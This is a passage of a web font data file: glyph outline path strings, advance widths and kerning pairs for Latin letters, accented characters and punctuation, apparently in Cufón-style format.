,"k":{"\u00ea":9,"\u00b9":7,"o":9,"e":9,"a":7,"\u0105":7,"\u0119":9,"\u00ff":-14,"\u2019":-19,"\u201d":-19,"\u2014":11,"\u2013":11,"\u2026":21,"\u00f8":9,"\u2122":-12,"\u00ae":-14,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":7,"\u00e3":7,"\u00e4":7,"\u00e2":7,"\u00e0":7,"\u00e1":7,"z":-10,"y":-14,"x":-12,"w":-14,"v":-14,"t":-14,"s":-2,"q":9,"g":1,"f":-14,"d":9,"c":9,";":-12,":":-12,"\/":18,".":21,"-":11,",":21,"*":-19,"!":-7}},"s":{"d":"110,-140v-31,-21,-94,-12,-74,28v23,24,85,33,85,73v0,49,-69,53,-111,31r8,-17v30,18,75,20,83,-13v-11,-42,-90,-38,-90,-89v0,-44,65,-51,106,-29","w":130,"k":{"\u00b9":-3,"a":-3,"\u0105":-3,"\u2019":-2,"\u201d":-2,"\u2014":-2,"\u2013":-2,"\u2026":-3,"\u00ae":-7,"\u00e5":-3,"\u00e3":-3,"\u00e4":-3,"\u00e2":-3,"\u00e0":-3,"\u00e1":-3,"t":-1,"f":-2,";":-3,":":-3,"\/":-2,".":-3,"-":-2,",":-3,"*":-5}},"t":{"d":"78,-1v-27,9,-55,5,-55,-31r0,-115r-22,-2r0,-14r22,0r0,-30r20,-4r0,34r35,0r0,14r-35,2r0,123v2,15,21,12,35,7r0,16","w":78,"k":{"\u00ea":7,"o":7,"e":7,"\u0119":7,"\u00ff":-12,"\u2019":-18,"\u201d":-18,"\u2014":7,"\u2013":7,"\u2026":-21,"\u00f8":7,"\u2122":-12,"\u00ae":-19,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00eb":7,"\u00e8":7,"\u00e9":7,"\u00e7":7,"z":-17,"y":-12,"w":-12,"v":-12,"t":-10,"s":-7,"q":7,"d":7,"c":7,"?":-7,";":-21,":":-21,"\/":-14,".":-21,"-":7,",":-21,"*":-19,"!":-10}},"u":{"d":"40,-49v-3,49,58,43,85,19r0,-133r18,0r0,163r-18,0r0,-13v-31,27,-103,25,-103,-33r0,-117r18,-4r0,118","w":164},"v":{"d":"137,-163r-56,163r-24,0r-57,-163r19,-4r50,151r48,-147r20,0","w":137,"k":{"\u00b9":2,"a":2,"\u0105":2,"\u00ff":-13,"\u2019":-22,"\u201d":-22,"\u2026":24,"\u2122":-12,"\u00ae":-14,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"y":-13,"w":-14,"v":-14,"t":-13,"s":-5,";":-10,":":-10,"\/":13,".":24,",":24,"*":-19,"!":-12}},"w":{"d":"222,-163r-47,163r-23,0r-41,-141r-40,141r-23,0r-47,-163r20,-4r38,146r41,-142r23,0r40,141r39,-141r20,0","w":222,"k":{"\u00b9":2,"a":2,"\u0105":2,"\u00ff":-12,"\u2019":-19,"\u201d":-22,"\u2026":18,"\u2122":-12,"\u00ae":-14,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"y":-12,"x":-12,"t":-13,"s":-6,";":-11,":":-11,"\/":7,".":18,",":18,"*":-19,"!":-11}},"x":{"d":"134,0r-23,0r-45,-75r-45,75r-23,0r54,-86r-50,-77r21,-4r43,69r38,-65r24,0r-48,76","w":130,"k":{"\u00ea":6,"\u00b9":-1,"o":5,"e":6,"a":-1,"\u0105":-1,"\u0119":6,"\u00ff":-12,"\u2019":-17,"\u201d":-18,"\u2014":7,"\u2013":7,"\u2026":-17,"\u00f8":5,"\u2122":-5,"\u00ae":-12,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":5,"\u00f6":5,"\u00f4":5,"\u00f2":5,"\u00f3":5,"\u00eb":6,"\u00e8":5,"\u00e9":6,"\u00e7":5,"\u00e5":-1,"\u00e3":-1,"\u00e4":-1,"\u00e2":-1,"\u00e0":-1,"\u00e1":-1,"y":-12,"x":-14,"u":2,"t":-7,"s":-5,"q":5,"d":5,"c":5,"?":-7,";":-17,":":-17,"\/":-24,".":-17,"-":7,",":-17,"*":-17,"!":-7}},"y":{"d":"139,-163r-66,190v-9,33,-29,49,-67,37r5,-16v37,18,44,-20,53,-48r-9,0r-55,-163r20,-4r48,152r49,-148r22,0","w":138,"k":{"\u00b9":2,"a":2,"\u0105":2,"\u2019":-22,"\u201d":-22,"\u2026":29,"\u2122":-12,"\u00ae":-14,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"z":-10,"t":-12,"s":-5,"g":-2,"f":-12,";":-10,":":-10,"\/":12,".":29,",":29,"*":-19,"!":-12}},"z":{"d":"126,0r-124,0r0,-12r98,-136r-94,-3r0,-12r119,0r0,11r-97,137r98,2r0,13","w":129,"k":{"\u00ea":8,"\u00b9":2,"o":6,"e":8,"a":2,"\u0105":2,"\u0119":8,"\u00ff":-12,"\u2019":-18,"\u201d":-18,"\u2014":10,"\u2013":10,"\u2026":-17,"\u00f8":6,"\u2122":-7,"\u00ae":-14,"\u00f5":6,"\u00f6":6,"\u00f4":6,"\u00f2":6,"\u00f3":6,"\u00eb":8,"\u00e8":8,"\u00e9":8,"\u00e7":6,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"z":-13,"y":-12,"w":-11,"v":-11,"s":-5,"q":6,"d":6,"c":6,"?":-5,";":-17,":":-17,"\/":-17,".":-17,"-":10,",":-17,"*":-17,"!":-5}},"{":{"d":"33,-123v45,14,32,55,32,116v0,18,7,28,24,29v0,4,1,9,-5,7v-79,3,2,-129,-62,-148r0,-8v64,-13,-20,-146,67,-141r0,8v-38,3,-20,48,-20,84v0,28,-14,48,-36,53","w":96},"|":{"d":"60,10r-12,0r0,-259r12,0r0,259","w":107},"}":{"d":"7,-268v87,-8,4,122,68,141r0,8v-67,15,23,152,-68,148r0,-7v39,-2,20,-55,20,-87v-1,-35,11,-49,37,-58v-42,-8,-32,-62,-32,-107v0,-19,-8,-29,-25,-30r0,-8","w":96},"~":{"d":"93,-120v4,7,23,14,14,20r-17,-17v-7,4,-13,21,-21,14r18,-17v-4,-7,-23,-14,-14,-20r17,17v7,-4,13,-21,21,-14","w":180},"\u00c4":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm105,-300v9,0,15,4,16,12v0,16,-32,17,-32,0v0,-9,8,-12,16,-12xm53,-300v8,0,16,3,16,12v0,8,-8,13,-16,13v-8,0,-16,-6,-16,-13v0,-8,8,-12,16,-12","w":155},"\u00c5":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm47,-287v1,-29,60,-31,61,0v0,13,-15,24,-30,24v-16,0,-31,-11,-31,-24xm77,-274v9,0,16,-5,17,-13v0,-7,-7,-13,-16,-12v-8,0,-16,3,-16,12v0,8,8,13,15,13","w":155},"\u00c7":{"d":"36,-115v0,57,12,101,57,103v14,0,30,-5,47,-14r5,15v-75,39,-131,2,-131,-106v0,-91,45,-151,125,-115r-4,15v-67,-31,-100,3,-99,102xm71,17v14,-11,41,-10,41,11v0,15,-12,26,-38,32r0,-11v14,-4,21,-9,21,-17v0,-11,-13,-7,-24,-3r0,-12","w":146},"\u00c9":{"d":"136,0r-114,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13xm116,-297r-54,36r-10,-10r47,-43","w":146},"\u00d6":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110xm120,-300v9,0,15,4,16,12v-1,16,-32,17,-32,0v-1,-9,8,-12,16,-12xm68,-300v8,0,16,3,16,12v0,8,-8,13,-16,13v-8,0,-16,-6,-16,-13v0,-8,8,-12,16,-12","w":188,"k":{"Z":10}},"\u00dc":{"d":"95,-13v34,0,55,-22,55,-57r0,-170r19,0r0,170v3,49,-30,74,-74,74v-44,0,-73,-26,-73,-74r0,-170r19,0r0,170v-1,35,20,57,54,57xm103,-288v0,-16,33,-16,33,0v-1,17,-33,17,-33,0xm68,-300v8,0,16,4,16,12v-1,16,-31,17,-32,0v0,-8,8,-12,16,-12","w":190},"\u00e1":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm118,-223r-53,36r-11,-9r48,-43"},"\u00e0":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm108,-197r-9,10r-55,-36r15,-16"},"\u00e2":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm124,-203r-6,13r-38,-22r-38,22r-6,-11r44,-34"},"\u00e4":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm90,-213v0,-16,33,-18,32,0v1,7,-7,13,-15,12v-9,0,-17,-5,-17,-12xm38,-213v1,-17,32,-17,33,0v0,16,-33,16,-33,0"},"\u00e3":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm38,-217v25,-21,59,10,85,-5r0,19v-28,14,-60,-18,-85,4r0,-18"},"\u00e5":{"d":"23,-157v47,-14,109,-23,109,36r0,121r-18,0r0,-16v-38,34,-105,24,-106,-31v0,-50,53,-66,105,-51v2,-33,-1,-54,-36,-53v-13,0,-28,4,-47,11xm30,-48v0,43,58,44,83,15r0,-50v-39,-12,-83,-4,-83,35xm80,-235v16,0,31,8,31,23v-1,30,-60,30,-61,0v0,-14,15,-23,30,-23xm64,-212v0,16,32,15,33,0v0,-16,-32,-17,-33,0"},"\u00e7":{"d":"35,-81v0,57,47,90,85,50r7,17v-51,43,-113,3,-113,-66v0,-70,60,-113,113,-69r-8,15v-40,-37,-84,-4,-84,53xm64,17v14,-11,41,-10,41,11v0,15,-12,26,-38,32r0,-11v14,-4,22,-9,22,-17v-3,-10,-14,-8,-25,-3r0,-12","w":132},"\u00e9":{"d":"82,-167v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-66,26,-126,-4,-126,-78v0,-48,23,-83,68,-83xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0xm119,-223r-54,36r-10,-9r48,-43","w":158},"\u00e8":{"d":"82,-167v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-66,26,-126,-4,-126,-78v0,-48,23,-83,68,-83xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0xm110,-197r-10,10r-55,-36r16,-16","w":158},"\u00eb":{"d":"82,-167v47,-1,70,40,64,91r-110,0v1,60,49,75,99,54r5,16v-66,26,-126,-4,-126,-78v0,-48,23,-83,68,-83xm126,-91v6,-58,-48,-77,-78,-45v-9,9,-13,26,-13,45r91,0xm92,-213v1,-17,32,-17,32,0v0,16,-32,15,-32,0xm40,-213v1,-17,32,-17,32,0v1,8,-8,13,-16,12v-8,0,-16,-5,-16,-12","w":158},"\u00ed":{"d":"40,0r-18,0r0,-163r18,-4r0,167xm69,-223r-53,36r-10,-9r47,-43","w":61,"k":{"l":-7,"k":-7,"j":-7,"i":-7,"h":-7,"f":-2,"b":-7}},"\u00ec":{"d":"40,0r-18,0r0,-163r18,-4r0,167xm58,-197r-10,10r-55,-36r16,-16","w":61},"\u00ee":{"d":"40,0r-18,0r0,-163r18,-4r0,167xm76,-203r-7,13r-38,-22r-38,22r-6,-11r44,-34","w":61},"\u00ef":{"d":"40,0r-18,0r0,-163r18,-4r0,167xm41,-213v0,-16,32,-18,32,0v0,8,-8,13,-16,12v-9,0,-15,-5,-16,-12xm-11,-213v1,-17,32,-17,33,0v0,16,-33,16,-33,0","w":61},"\u00f3":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70xm118,-223r-54,36r-10,-9r48,-43","w":165},"\u00f2":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70xm110,-197r-10,10r-55,-36r16,-16","w":165},"\u00f4":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70xm128,-203r-6,13r-39,-22r-37,22r-7,-11r44,-34","w":165},"\u00f6":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70xm93,-213v1,-17,33,-17,33,0v0,17,-33,15,-33,0xm58,-226v8,0,16,5,16,13v0,7,-8,13,-16,12v-8,0,-16,-4,-16,-12v0,-9,8,-13,16,-13","w":165},"\u00f5":{"d":"83,-167v47,0,68,36,68,85v0,50,-21,86,-68,86v-47,0,-69,-35,-69,-85v0,-51,21,-86,69,-86xm83,-12v35,-1,47,-31,47,-70v0,-39,-13,-69,-47,-69v-34,0,-47,30,-47,69v0,47,16,70,47,70xm41,-217v25,-21,60,10,85,-5r0,19v-28,14,-60,-18,-85,4r0,-18","w":165},"\u00fa":{"d":"40,-49v-3,49,58,43,85,19r0,-133r18,0r0,163r-18,0r0,-13v-31,27,-103,25,-103,-33r0,-117r18,-4r0,118xm122,-223r-54,36r-10,-9r47,-43","w":164},"\u00f9":{"d":"40,-49v-3,49,58,43,85,19r0,-133r18,0r0,163r-18,0r0,-13v-31,27,-103,25,-103,-33r0,-117r18,-4r0,118xm107,-197r-10,10r-55,-36r15,-16","w":164},"\u00fb":{"d":"40,-49v-3,49,58,43,85,19r0,-133r18,0r0,163r-18,0r0,-13v-31,27,-103,25,-103,-33r0,-117r18,-4r0,118xm127,-203r-7,13r-38,-22r-38,22r-6,-11r44,-34","w":164},"\u00fc":{"d":"40,-49v-3,49,58,43,85,19r0,-133r18,0r0,163r-18,0r0,-13v-31,27,-103,25,-103,-33r0,-117r18,-4r0,118xm92,-213v1,-17,32,-17,32,0v0,16,-32,15,-32,0xm40,-213v1,-17,32,-17,32,0v1,8,-8,13,-16,12v-8,0,-16,-5,-16,-12","w":164},"\u00b0":{"d":"55,-243v24,0,43,20,43,42v1,24,-20,43,-42,43v-23,0,-43,-20,-43,-43v0,-23,19,-42,42,-42xm55,-173v16,0,28,-12,28,-28v0,-16,-12,-27,-28,-27v-15,0,-27,12,-27,27v0,16,12,28,27,28","w":110},"\u00a2":{"d":"71,-50v-37,-7,-57,-37,-57,-83v0,-51,19,-79,57,-86r0,-21r14,0r0,20v15,2,29,8,42,18r-8,15v-11,-9,-23,-14,-34,-16r0,137v11,-1,23,-7,35,-17r7,16v-14,10,-27,16,-42,18r0,27r-14,0r0,-28xm71,-68r0,-134v-47,6,-49,128,0,134","w":141},"\u00a7":{"d":"142,-198v0,-42,-85,-41,-85,-1v13,54,118,35,118,101v0,19,-11,35,-33,48v37,32,0,84,-48,81v-36,-2,-62,-18,-66,-51r20,0v3,24,18,35,45,35v42,0,58,-48,20,-62v-33,-22,-100,-23,-100,-71v0,-21,13,-37,38,-49v-38,-30,-1,-78,48,-78v36,0,57,15,63,47r-20,0xm125,-62v33,-12,40,-50,9,-64r-69,-31v-34,13,-43,48,-10,63","w":189},"\u00b6":{"d":"13,-165v2,-52,22,-75,88,-75r66,0r0,12r-21,0r0,330r-13,0r0,-330r-36,0r0,330r-14,0r0,-191v-44,-2,-72,-30,-70,-76xm83,-228v-60,-4,-68,79,-37,112v9,9,21,14,37,15r0,-127","w":180},"\u00df":{"d":"79,-243v50,-3,64,51,33,81v-36,35,41,65,41,114v0,40,-40,61,-80,47r4,-15v29,10,56,-5,56,-31v0,-44,-81,-81,-33,-131v20,-21,7,-51,-23,-50v-25,0,-37,13,-36,41r0,187r-19,0r0,-186v-2,-41,21,-55,57,-57","w":162},"\u00ae":{"d":"119,-245v55,0,101,46,101,101v0,54,-46,100,-100,100v-54,0,-101,-46,-101,-99v0,-55,45,-102,100,-102xm119,-54v49,0,91,-41,91,-90v0,-49,-42,-91,-90,-91v-47,0,-91,41,-91,89v0,50,40,92,90,92xm152,-170v-1,17,-13,29,-32,27r42,54r-18,0r-37,-51r0,51r-16,0r0,-108v29,-1,63,-2,61,27xm136,-170v0,-15,-12,-18,-29,-17r0,37v18,1,29,-5,29,-20","w":239},"\u00a9":{"d":"153,-245v69,0,126,57,126,125v0,68,-58,125,-126,125v-66,0,-124,-56,-124,-123v0,-69,56,-127,124,-127xm153,-5v64,0,116,-52,116,-115v0,-63,-53,-115,-116,-115v-62,0,-115,52,-115,113v0,64,52,117,115,117xm107,-118v0,-55,30,-90,80,-69r-4,14v-37,-15,-54,3,-54,56v0,53,24,68,58,49r3,15v-47,21,-83,0,-83,-65","w":307},"\u2122":{"d":"164,-132r-13,0r-7,-87r-19,87r-11,0r-19,-87r-7,87r-13,0r10,-108r15,0r20,85r19,-85r16,0xm66,-230r-22,3r0,95r-13,0r0,-95r-23,-3r0,-10r58,0r0,10","w":181},"\u00b4":{"d":"73,-223r-53,36r-10,-9r47,-43","w":83},"\u00a8":{"d":"61,-213v1,-17,33,-17,33,0v0,17,-33,15,-33,0xm26,-226v8,0,16,5,16,13v0,7,-8,13,-16,12v-8,0,-16,-4,-16,-12v0,-9,8,-13,16,-13","w":103},"\u00d8":{"d":"32,-33v-31,-66,-27,-210,62,-210v23,0,43,9,57,28r18,-28r13,8r-23,34v29,68,21,205,-65,205v-22,0,-39,-8,-53,-24r-18,27r-12,-8xm94,-228v-66,1,-65,116,-49,175r94,-144v-11,-21,-26,-31,-45,-31xm94,-11v64,-2,67,-106,52,-169r-94,143v11,17,25,26,42,26","w":188,"k":{"Z":5}},"\u00b1":{"d":"134,-87r-52,0r0,51r-17,0r0,-51r-52,0r0,-17r52,0r0,-52r17,0r0,52r52,0r0,17xm134,0r-121,0r0,-17r121,0r0,17","w":147},"\u00aa":{"d":"20,-237v36,-10,77,-15,76,26r0,85r-13,0r0,-11v-27,24,-73,16,-73,-22v0,-36,37,-47,73,-36v7,-41,-27,-43,-59,-30xm59,-188v-40,-5,-47,54,-7,53v10,0,21,-5,31,-15r0,-35v-9,-2,-18,-3,-24,-3","w":105},"\u00ba":{"d":"60,-244v33,1,48,25,48,60v0,35,-15,60,-48,60v-33,0,-48,-24,-48,-59v-1,-35,15,-61,48,-61xm93,-184v0,-32,-11,-48,-33,-48v-22,0,-33,16,-33,48v0,33,11,49,33,49v22,0,33,-17,33,-49","w":119},"\u00f8":{"d":"34,-16v-37,-44,-25,-151,49,-151v17,0,30,4,41,12r12,-18r13,8r-14,22v32,50,19,147,-52,147v-14,0,-27,-3,-38,-10r-13,20r-12,-9xm114,-139v-38,-31,-78,3,-78,57v0,19,3,35,9,48xm55,-22v39,28,75,-8,75,-60v0,-16,-2,-30,-7,-43","w":165},"\u00a1":{"d":"26,-155v1,-15,32,-15,33,0v-1,17,-33,17,-33,0xm55,76r-24,0r7,-193r11,0","w":80},"\u00ac":{"d":"184,-22r-21,0r0,-67r-167,0r0,-21r188,0r0,88","w":180},"\u0192":{"d":"160,-237r-5,15v-26,-6,-44,1,-48,29r-4,30r46,0r-2,14r-45,2r-18,167v-3,43,-30,52,-72,45r7,-17v26,6,44,1,47,-29r17,-166r-21,-2r1,-14r22,0v4,-41,5,-80,54,-77v8,0,15,1,21,3","w":159,"k":{"9":-5,"7":-14,"6":7,"4":14,"3":-14,"2":-5,"1":-7}},"\u00ab":{"d":"111,-143r-31,62r31,60r-12,4r-39,-64r39,-67xm68,-143r-31,62r30,60r-12,4r-38,-64r39,-67","w":127},"\u00bb":{"d":"110,-81r-39,64r-11,-4r29,-60r-29,-63r12,-4xm67,-81r-39,64r-11,-4r29,-60r-29,-63r11,-4","w":127},"\u2026":{"d":"145,-9v0,-19,32,-15,32,0v-1,16,-32,18,-32,0xm77,-9v1,-17,33,-17,33,0v-1,16,-33,17,-33,0xm10,-9v0,-17,32,-17,33,0v-1,16,-33,17,-33,0","w":187,"k":{"\u00ea":12,"\u00c6":19,"\u00a5":-23,"\u00b9":-2,"o":10,"e":12,"a":-2,"W":22,"T":36,"O":19,"C":19,"A":-23,"\u0105":-2,"\u0119":12,"\u0106":19,"\u0104":-23,"\u00d3":19,"\u2019":12,"\u201d":12,"\u00f3":10,"z":-19,"y":24,"x":-17,"w":18,"v":24,"u":7,"t":4,"s":-8,"q":10,"g":-7,"f":1,"d":10,"c":10,"Z":-21,"Y":43,"X":-18,"V":33,"U":13,"S":-10,"Q":19,"M":-10,"G":19,"9":12,"8":5,"7":-17,"6":13,"5":-15,"4":12,"3":-12,"2":-11,"1":-8,"0":15}},"\u00c0":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm103,-271r-10,10r-55,-36r16,-17","w":155},"\u00c3":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm35,-291v25,-21,60,9,86,-6r0,19v-29,14,-62,-18,-86,5r0,-18","w":155},"\u00d5":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110xm51,-291v25,-21,60,9,86,-6r0,19v-29,14,-62,-18,-86,5r0,-18","w":188},"\u2013":{"d":"192,-79r-168,0r0,-17r168,0r0,17","w":216,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0105":-4,"\u0119":-5,"\u0106":-5,"\u00d3":-5,"\u00f3":-5,"z":12,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":7,"Y":36,"X":8,"V":12,"S":12,"Q":-5,"G":-5}},"\u2014":{"d":"360,-79r-336,0r0,-17r336,0r0,17","w":384,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0105":-4,"\u0119":-5,"\u0106":-5,"\u00d3":-5,"\u00f3":-5,"z":12,"x":10,"s":-2,"q":-5,"g":-5,"d":-5,"c":-5,"Z":7,"Y":36,"X":8,"V":12,"S":12,"Q":-5,"G":-5}},"\u201c":{"d":"91,-237r-16,64r-25,0r31,-67xm48,-237r-16,64r-25,0r30,-67","w":98,"k":{"\u00ea":29,"\u00c6":7,"\u00a5":26,"\u00b9":22,"o":29,"e":29,"a":22,"W":-19,"T":-18,"O":7,"C":7,"A":26,"\u0105":22,"\u0119":29,"\u0106":7,"\u0104":26,"\u00d3":7,"\u2026":24,"\u00f3":29,"z":-2,"y":-8,"x":-6,"w":-8,"v":-8,"u":11,"t":-7,"s":15,"r":11,"q":29,"p":11,"n":11,"m":11,"j":-1,"i":-1,"g":22,"f":-5,"d":29,"c":29,"Z":-12,"Y":-22,"X":-8,"V":-19,"S":-4,"Q":7,"M":10,"G":7}},"\u201d":{"d":"91,-240r-30,67r-11,-2r17,-65r24,0xm48,-240r-30,67r-11,-2r16,-65r25,0","w":98},"\u2018":{"d":"48,-237r-16,64r-25,0r30,-67","w":55,"k":{"\u00ea":29,"\u00c6":7,"\u00a5":26,"\u00b9":22,"o":29,"e":29,"a":22,"W":-19,"T":-18,"O":7,"C":7,"A":26,"\u0105":22,"\u0119":29,"\u0106":7,"\u0104":26,"\u00d3":7,"\u2026":24,"\u00f3":29,"z":-2,"y":-8,"x":-6,"w":-8,"v":-8,"u":11,"t":-7,"s":15,"r":11,"q":29,"p":11,"n":11,"m":11,"j":-1,"i":-1,"g":22,"f":-5,"d":29,"c":29,"Z":-12,"Y":-22,"X":-8,"V":-19,"S":-4,"Q":7,"M":10,"G":7}},"\u2019":{"d":"48,-240r-30,67r-11,-2r16,-65r25,0","w":55,"k":{"o":38,"T":-21,"O":19,"\u00d3":19,"\u00f3":38,"v":5,"t":5,"s":36,"r":26,"m":26,"d":38,"V":-26,"S":5,"M":13}},"\u00ff":{"d":"139,-163r-66,190v-9,33,-29,49,-67,37r5,-16v37,18,44,-20,53,-48r-9,0r-55,-163r20,-4r48,152r49,-148r22,0xm78,-213v1,-17,33,-17,33,0v0,17,-33,15,-33,0xm27,-213v1,-17,31,-17,32,0v0,7,-8,13,-16,12v-8,0,-16,-5,-16,-12","w":138},"\u00b7":{"d":"19,-120v0,-17,32,-17,33,0v-1,16,-33,17,-33,0","w":70},"\u2219":{"d":"19,-120v0,-17,32,-17,33,0v-1,16,-33,17,-33,0","w":70},"\u201e":{"d":"89,-24r-31,68r-10,-3r16,-65r25,0xm45,-24r-30,68r-10,-3r16,-65r24,0","w":95},"\u00c2":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm122,-277r-7,12r-38,-22r-37,22r-7,-10r44,-35","w":155},"\u00c1":{"d":"159,0r-20,0r-27,-94r-69,0r-26,94r-21,0r71,-240r21,0xm108,-108r-31,-109r-30,109r61,0xm118,-297r-53,36r-11,-10r48,-43","w":155},"\u00cb":{"d":"136,0r-114,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13xm103,-300v9,0,16,3,16,12v1,8,-8,13,-15,13v-9,0,-16,-5,-17,-13v0,-8,8,-12,16,-12xm52,-300v8,0,16,4,16,12v-1,16,-32,17,-32,0v-1,-9,8,-12,16,-12","w":146},"\u00c8":{"d":"136,0r-114,0r0,-240r112,0r0,13r-93,4r0,92r86,0r0,14r-86,0r0,100r95,4r0,13xm103,-271r-9,10r-56,-36r16,-17","w":146},"\u00cd":{"d":"41,0r-19,0r0,-240r19,0r0,240xm69,-297r-53,36r-10,-10r47,-43","w":62},"\u00ce":{"d":"41,0r-19,0r0,-240r19,0r0,240xm75,-277r-6,12r-38,-22r-38,22r-7,-10r45,-35","w":62},"\u00cf":{"d":"41,0r-19,0r0,-240r19,0r0,240xm40,-288v0,-16,33,-16,33,0v-1,17,-33,17,-33,0xm5,-300v8,0,16,4,16,12v-1,16,-32,17,-32,0v-1,-9,8,-12,16,-12","w":62},"\u00cc":{"d":"41,0r-19,0r0,-240r19,0r0,240xm58,-271r-10,10r-55,-36r16,-17","w":62},"\u00d3":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110xm131,-297r-53,36r-11,-10r48,-43","w":188,"k":{"\u00b9":2,"a":2,"T":19,"\u0105":2,"\u00ff":-8,"\u2014":-5,"\u2013":-5,"\u2026":19,"\u00e5":2,"\u00e3":2,"\u00e4":2,"\u00e2":2,"\u00e0":2,"\u00e1":2,"z":-2,"y":-8,"x":-2,"w":-8,"v":-8,"t":-5,"f":-5,"Z":10,"Y":6,"X":11,"?":5,";":-7,":":-7,"\/":14,".":19,"-":-5,",":19}},"\u00d4":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110xm138,-277r-6,12r-38,-22r-38,22r-7,-10r45,-35","w":188},"\u00d2":{"d":"94,-243v59,0,80,54,80,123v0,69,-20,124,-80,124v-59,0,-80,-55,-80,-122v0,-70,20,-125,80,-125xm94,-11v46,0,59,-53,59,-109v0,-55,-13,-108,-59,-108v-45,0,-59,52,-59,107v1,57,13,110,59,110xm118,-271r-10,10r-55,-36r16,-17","w":188},"\u00da":{"d":"95,-13v34,0,55,-22,55,-57r0,-170r19,0r0,170v3,49,-30,74,-74,74v-44,0,-73,-26,-73,